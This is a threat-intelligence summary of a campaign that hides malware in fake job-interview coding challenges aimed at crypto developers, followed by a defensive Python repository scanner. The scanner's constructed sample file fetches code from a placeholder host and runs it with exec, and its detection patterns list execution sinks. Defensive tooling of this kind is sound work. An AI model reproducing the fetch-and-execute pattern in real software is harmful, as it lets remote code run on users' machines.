Posing as potential employers, Slow Pisces hackers conceal malware in coding challenges sent to cryptocurrency developers on LinkedIn
Analysis Summary
# Threat Actor: Slow Pisces
## Attribution & Identity
Assessed to be affiliated with the North Korean regime. Slow Pisces is the name used by Unit 42 (Palo Alto Networks' threat research team) for this group.
## Activity Summary
Researchers observed a new malicious campaign initiated in 2024. The group targets developers associated with cryptocurrency projects by posing as recruiters on LinkedIn. They use PDF lures containing job descriptions, and if the target responds, they administer a coding challenge that directs victims to malicious GitHub repositories containing malware payloads.
## Tactics, Techniques & Procedures
- **Social Engineering:** Impersonating recruiters on LinkedIn to establish contact.
- **Delivery via Lure:** Using seemingly benign PDF documents as the initial lure.
- **Malicious Payload Hosting:** Hosting malicious code/repositories on GitHub.
- **Exploitation of Trust:** Leveraging professional platforms (LinkedIn) and technical challenges (coding tasks) to gain developer trust.
- **Payload Deployment:** Delivery of custom malware payloads (RN Loader and RN Stealer).
## Targeting
- **Sectors:** Cryptocurrency projects/developers.
- **Geography:** Not explicitly stated; targeting follows the individual's role in the cryptocurrency sector rather than their location, so exposure is global.
- **Victims:** Developers specifically involved in cryptocurrency projects.
## Tools & Infrastructure
- **Malware families used:** RN Loader and RN Stealer (new payloads identified by Unit 42).
- **Infrastructure (C2, domains, IPs):** Malicious repositories hosted on GitHub; no C2 domains or IP addresses are given in this summary.
## Implications
Slow Pisces is using sophisticated social engineering against a high-value technical sector (cryptocurrency) to deploy custom infostealers, likely for financial gain or for intelligence collection related to blockchain technology and assets. Because the chain runs through recognized platforms (LinkedIn for contact, GitHub for hosting) and relies on a benign-looking PDF lure followed by code the victim runs voluntarily, it is hard to detect for security tools that are not tuned to social-engineering-driven delivery rather than document exploits.
## Mitigations
- Developers, especially those in crypto projects, should exercise extreme caution regarding unsolicited job offers or coding challenges received via professional networking sites like LinkedIn.
- Vet external links, especially those leading to code repositories, even if presented as part of a job interview process.
- Enhance endpoint detection to flag suspicious execution chains that begin when a developer runs code from a freshly cloned repository, such as interpreters or build tools that reach out to fetch and execute additional code.
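The "vet external links" advice above is only useful if a developer has something concrete to run before executing a take-home task. The following is an added example, not code from Unit 42 or from the report: it walks a cloned repository and flags files that fetch remote content and execute it, dynamic-execution sinks, and install-time hooks that run before anyone reads the code. The indicator patterns, directory layout and sample files are constructed assumptions for illustration, not artifacts from the campaign.

```python
"""Pre-execution vetting of a cloned 'coding challenge' repository.

Added example; not code from Unit 42 or the report. The patterns and the
sample repository below are constructed assumptions, not Slow Pisces
artifacts. The aim is to surface fetch-then-execute code and install hooks
before a developer runs anything from the checkout.
"""
import json
import os
import re
import tempfile
from dataclasses import dataclass

# Network fetch sites (assumed indicators, Python and JavaScript flavoured).
FETCH_RE = re.compile(r"urllib\.request\.urlopen\(|requests\.(?:get|post)\(|\bfetch\(|https?://")
# Dynamic-execution and unsafe-deserialization sinks.
EXEC_RE = re.compile(
    r"\bexec\(|\beval\(|subprocess\.(?:run|Popen|call)\(|\bchild_process\b"
    r"|new Function\(|base64\.b64decode\(|pickle\.loads\(|yaml\.load\("
)
SCAN_EXT = {".py", ".js", ".ts", ".mjs", ".sh"}
# npm lifecycle scripts that run automatically on `npm install`.
NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare")


@dataclass
class Finding:
    path: str
    line: int
    kind: str
    snippet: str


def scan_source(path: str) -> list[Finding]:
    """Flag lines that fetch remote content or execute dynamic code.

    A file that does both is the pattern to stop on: a take-home task has no
    legitimate reason to pull code from the network and run it.
    """
    findings: list[Finding] = []
    fetches = execs = 0
    with open(path, encoding="utf-8", errors="replace") as fh:
        for no, text in enumerate(fh, 1):
            line = text.strip()
            if FETCH_RE.search(line):
                fetches += 1
            if EXEC_RE.search(line):
                execs += 1
                findings.append(Finding(path, no, "dynamic-execution", line[:80]))
    if fetches and execs:
        findings.append(Finding(path, 0, "fetch-and-execute", f"{fetches} fetch / {execs} exec site(s)"))
    return findings


def scan_package_json(path: str) -> list[Finding]:
    """Flag npm lifecycle hooks, which run before the developer reads any code."""
    with open(path, encoding="utf-8") as fh:
        try:
            scripts = json.load(fh).get("scripts", {})
        except json.JSONDecodeError:
            return [Finding(path, 0, "unparseable-package-json", "")]
    return [Finding(path, 0, "install-hook", f"{h}: {scripts[h]}") for h in NPM_HOOKS if h in scripts]


def vet_repository(root: str) -> list[Finding]:
    """Walk a checkout and collect everything worth reading before running it."""
    findings: list[Finding] = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in {".git", "node_modules"}]
        for name in filenames:
            full = os.path.join(dirpath, name)
            if name == "package.json":
                findings.extend(scan_package_json(full))
            elif name == "setup.py":  # runs on `pip install .`, so always read it
                findings.append(Finding(full, 0, "install-hook", "setup.py runs on pip install"))
                findings.extend(scan_source(full))
            elif os.path.splitext(name)[1] in SCAN_EXT:
                findings.extend(scan_source(full))
    return findings


def build_sample_repo() -> str:
    """Constructed sample (not a real campaign repository): a plausible challenge layout."""
    root = tempfile.mkdtemp(prefix="challenge-")
    os.makedirs(os.path.join(root, "src", "utils"))
    with open(os.path.join(root, "src", "app.py"), "w") as fh:
        fh.write("def add(a, b):\n    return a + b\n")
    with open(os.path.join(root, "src", "utils", "config.py"), "w") as fh:
        fh.write(
            "import urllib.request\n"
            "resp = urllib.request.urlopen('https://example.invalid/settings')\n"
            "exec(resp.read().decode())\n"
        )
    with open(os.path.join(root, "package.json"), "w") as fh:
        json.dump({"name": "challenge", "scripts": {"postinstall": "node src/utils/bootstrap.js"}}, fh)
    return root


def demo() -> dict[str, int]:
    """Run the scanner over the constructed sample and count findings by kind."""
    counts: dict[str, int] = {}
    for f in vet_repository(build_sample_repo()):
        counts[f.kind] = counts.get(f.kind, 0) + 1
    return counts


if __name__ == "__main__":
    for f in vet_repository(build_sample_repo()):
        print(f"{f.kind:20} {f.path}:{f.line}  {f.snippet}")
```

Run it against a checkout before `npm install`, `pip install` or opening the project in an IDE that auto-runs tasks. The regexes are deliberately broad; the point is a short list a human reads, not an automated verdict, and a single fetch-and-execute hit in a "coding challenge" is reason enough to stop.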